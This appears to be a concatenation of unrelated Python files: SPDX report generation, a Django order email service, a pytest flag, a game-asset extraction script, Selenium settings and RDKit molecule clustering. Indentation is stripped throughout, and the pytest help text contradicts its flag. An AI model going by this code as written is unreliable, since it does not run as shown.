For the sake of SPDX, an image is a 'Package' which 'CONTAINS' each
layer which is also a 'Package' which 'CONTAINS' the real Packages'''
logger.debug("Generating SPDX JSON document...")
# we still don't know how SPDX documents could represent multiple
# images. Hence we will assume only one image is analyzed and the
# input is a list of length 1
image_obj = image_obj_list[0]
template = SPDX()
report = get_document_dict(image_obj, template)
return json.dumps(report)
def generate_layer(self, layer):
"""Generate an SPDX document containing package and file information
at container build time"""
logger.debug("Generating SPDX JSON document...")
template = SPDX()
report = get_document_dict_snapshot(layer, template)
return json.dumps(report)
|
from django.utils.functional import cached_property
from orders.models import Order
from users.models import User
from users.services import UserCreator
class OrderEmailChanger:
def __init__(self, order: Order, email: str):
self.order = order
self.email = email
def __call__(self):
if self.was_shipped:
self.order.unship()
self.order.user = self.get_user()
self.order.save()
if self.was_shipped:
self.order.ship()
@cached_property
def was_shipped(self) -> bool:
return self.order.shipped is not None
def get_user(self) -> User:
user: User = self.order.user
user_creator = UserCreator(email=self.email, name=f'{user.first_name} {user.last_name}')
return user_creator()
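# Usage sketch (the `order` instance below is assumed to exist): the service object is
# callable and re-ships the order if it had already been shipped.
# changer = OrderEmailChanger(order=order, email='new-address@example.com')
# changer()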
|
def pytest_addoption(parser):
"""
add `--show-viewer` as a valid command line flag
"""
parser.addoption(
"--show-viewer",
action="store_true",
default=False,
help="don't show viewer during tests",
)
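# A fixture can then expose the flag to tests; request.config.getoption is
# standard pytest API, while the fixture name itself is only an example.
import pytest
@pytest.fixture
def show_viewer(request):
    """Whether the test run was started with --show-viewer."""
    return request.config.getoption("--show-viewer")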
|
# -*- coding: utf-8 -*-
import phyre, importlib, os
importlib.reload(phyre)
# 1 or 2
ffx=1
# pc, npc, mon, obj, skl, sum, or wep
tp = 'pc'
# model number (no leading zeros)
num = 106
ffxBaseDir=r'C:\SteamLibrary\steamapps\common\FINAL FANTASY FFX&FFX-2 HD Remaster\data\FFX_Data_VBF\ffx_data\gamedata\ps3data\chr'
ffx2BaseDir=r'C:\SteamLibrary\steamapps\common\FINAL FANTASY FFX&FFX-2 HD Remaster\data\FFX2_Data_VBF\ffx-2_data\gamedata\ps3data\chr'
baseDir=[ffxBaseDir, ffx2BaseDir]
types={'pc':'c', 'npc':'n', 'mon':'m', 'obj':'f', 'skl':'k', 'sum':'s', 'wep':'w'}
file=baseDir[ffx-1]
cs = types[tp] + '%03d' % num
meshFile = os.path.join(file, tp, cs,'mdl','d3d11', cs + r'.dae.phyre')
ddsFile = os.path.join(file, tp, cs, 'tex', 'd3d11', cs + r'.dds.phyre')
outFile = r'mytest.obj'
outFile2 = r'mytest.dds'
#outFile = None
phyre.extractMesh(meshFile,outFile, debug=False)
print("\n")
if os.path.isfile(ddsFile):
phyre.extractDDS(ddsFile, outFile2)
else:
print("DDS file not found. Skipping") |
from django.conf import settings as django_settings
class LazySettings(object):
@property
def DJANGO_LIVE_TEST_SERVER_ADDRESS(self):
"""Address at which to run the test server"""
return getattr(django_settings, 'DJANGO_LIVE_TEST_SERVER_ADDRESS',
'localhost:9001')
@property
def SELENIUM_TEST_COMMAND_OPTIONS(self):
"""Extra options to provide to the test runner"""
return getattr(django_settings, 'SELENIUM_TEST_COMMAND_OPTIONS', {})
@property
def SELENIUM_DEFAULT_BROWSER(self):
"""Default browser to use when running tests"""
return getattr(django_settings, 'SELENIUM_DEFAULT_BROWSER', ['chrome'])
@property
def SELENIUM_DEFAULT_TESTS(self):
"""Default Selenium test package to run"""
return getattr(django_settings, 'SELENIUM_DEFAULT_TESTS', [])
@property
def SELENIUM_POLL_FREQUENCY(self):
"""Default operation retry frequency"""
return getattr(django_settings, 'SELENIUM_POLL_FREQUENCY', 0.5)
@property
def SELENIUM_JAR_PATH(self):
"""Absolute path to the Selenium server jar file"""
return getattr(django_settings, 'SELENIUM_JAR_PATH', '')
@property
def SELENIUM_SAUCE_API_KEY(self):
"""API key for the Sauce Labs account to use for running tests"""
return getattr(django_settings, 'SELENIUM_SAUCE_API_KEY', '')
@property
def SELENIUM_SAUCE_CONNECT_PATH(self):
"""Absolute path to the Sauce Connect binary (for Sauce Labs)"""
return getattr(django_settings, 'SELENIUM_SAUCE_CONNECT_PATH', '')
@property
def SELENIUM_SAUCE_USERNAME(self):
"""Username for the Sauce Labs account to use for running tests"""
return getattr(django_settings, 'SELENIUM_SAUCE_USERNAME', '')
@property
def SELENIUM_SAUCE_VERSION(self):
"""Version of Selenium to use in the Sauce Labs virtual machines. If
omitted, uses the current default version used by Sauce Labs."""
return getattr(django_settings, 'SELENIUM_SAUCE_VERSION', '')
@property
def SELENIUM_SCREENSHOT_DIR(self):
"""Directory in which to store screenshots"""
return getattr(django_settings, 'SELENIUM_SCREENSHOT_DIR', '')
@property
def SELENIUM_TIMEOUT(self):
"""Default operation timeout in seconds"""
return getattr(django_settings, 'SELENIUM_TIMEOUT', 10)
@property
def SELENIUM_PAGE_LOAD_TIMEOUT(self):
"""Connection timeout for page load GET requests in seconds"""
return getattr(django_settings, 'SELENIUM_PAGE_LOAD_TIMEOUT', 10)
settings = LazySettings()
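# Usage sketch: import the module-level `settings` object instead of django.conf.settings
# so the defaults above apply automatically (the import path is an assumption):
# from myproject.selenium_settings import settings
# timeout = settings.SELENIUM_TIMEOUT  # 10 unless overridden in Django settings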
|
import re
import logging
from rdkit import DataStructs
from rdkit.ML.Cluster import Butina
from luna.util.exceptions import IllegalArgumentError
logger = logging.getLogger()
def available_similarity_functions():
"""Return a list of all similarity metrics available at RDKit."""
regex = re.compile("Bulk([a-zA-Z]+)Similarity", flags=0)
return list(filter(regex.match, dir(DataStructs)))
def calc_distance_matrix(fps, similarity_func="BulkTanimotoSimilarity"):
"""Calculate the pairwise distance (dissimilarity) between fingerprints in ``fps`` using
the similarity metric ``similarity_func``.
Parameters
----------
fps : iterable of RDKit :class:`~rdkit.DataStructs.cDataStructs.ExplicitBitVect` or :class:`~rdkit.DataStructs.cDataStructs.SparseBitVect`
A sequence of fingerprints.
similarity_func : str
A similarity metric to calculate the distance between the provided fingerprints. The default value is 'BulkTanimotoSimilarity'.
To check out the list of available similarity metrics, call the function :py:meth:`available_similarity_functions`.
Examples
--------
First, let's define a set of molecules.
>>> from luna.wrappers.base import MolWrapper
>>> mols = [MolWrapper.from_smiles("CCCCCC").unwrap(),
... MolWrapper.from_smiles("CCCCCCCC").unwrap(),
... MolWrapper.from_smiles("CCCCCCCCO").unwrap()]
Now, we generate fingerprints for those molecules.
>>> from luna.mol.fingerprint import generate_fp_for_mols
>>> fps = [d["fp"] for d in generate_fp_for_mols(mols, "morgan_fp")]
Finally, calculate the distance between the molecules based on their fingerprints.
>>> from luna.mol.clustering import calc_distance_matrix
>>> print(calc_distance_matrix(fps))
[0.125, 0.46153846153846156, 0.3846153846153846]
Returns
-------
distances : list of float
Flattened diagonal matrix.
"""
funcs = available_similarity_functions()
if similarity_func not in funcs:
raise IllegalArgumentError("Similarity function not available.")
dists = []
for i in range(1, len(fps)):
if (similarity_func == "BulkTverskySimilarity"):
params = [fps[i], fps[:i], 0, 1]
else:
params = [fps[i], fps[:i]]
sims = getattr(DataStructs, similarity_func)(*params)
dists.extend([1 - x for x in sims])
return dists
def cluster_fps(fps, cutoff=0.2, similarity_func="BulkTanimotoSimilarity"):
"""Clusterize molecules based on fingerprints using the Butina clustering algorithm.
Parameters
----------
fps : iterable of RDKit :class:`~rdkit.DataStructs.cDataStructs.ExplicitBitVect` or :class:`~rdkit.DataStructs.cDataStructs.SparseBitVect`
A sequence of fingerprints.
cutoff : float
Elements within this range of each other are considered to be neighbors.
similarity_func : str
A similarity metric to calculate the distance between the provided fingerprints. The default value is 'BulkTanimotoSimilarity'.
To check out the list of available similarity metrics, call the function :py:meth:`available_similarity_functions`.
Examples
--------
First, let's define a set of molecules.
>>> from luna.wrappers.base import MolWrapper
>>> mols = [MolWrapper.from_smiles("CCCCCC").unwrap(),
... MolWrapper.from_smiles("CCCCCCCC").unwrap(),
... MolWrapper.from_smiles("CCCCCCCCO").unwrap()]
Now, we generate fingerprints for those molecules.
>>> from luna.mol.fingerprint import generate_fp_for_mols
>>> fps = [d["fp"] for d in generate_fp_for_mols(mols, "morgan_fp")]
Finally, clusterize the molecules based on their fingerprints.
>>> from luna.mol.clustering import cluster_fps
>>> print(cluster_fps(fps, cutoff=0.2))
((1, 0), (2,))
Returns
-------
clusters : tuple of tuples
Each cluster is defined as a tuple of tuples, where the first element for each cluster is its centroid.
"""
logger.debug("Trying to clusterize %d molecules." % len(fps))
logger.debug("Defined cutoff: %.2f. Defined similarity function: %s." % (cutoff, similarity_func))
# first generate the distance matrix.
dists = calc_distance_matrix(fps, similarity_func)
logger.debug("Distance matrix created.")
# now cluster the data.
cs = Butina.ClusterData(dists, len(fps), cutoff, isDistData=True)
logger.debug("Number of cluster(s) created: %d." % len(cs))
return cs
|
from flask import Blueprint
assets = Blueprint('assets', __name__)
from . import api
|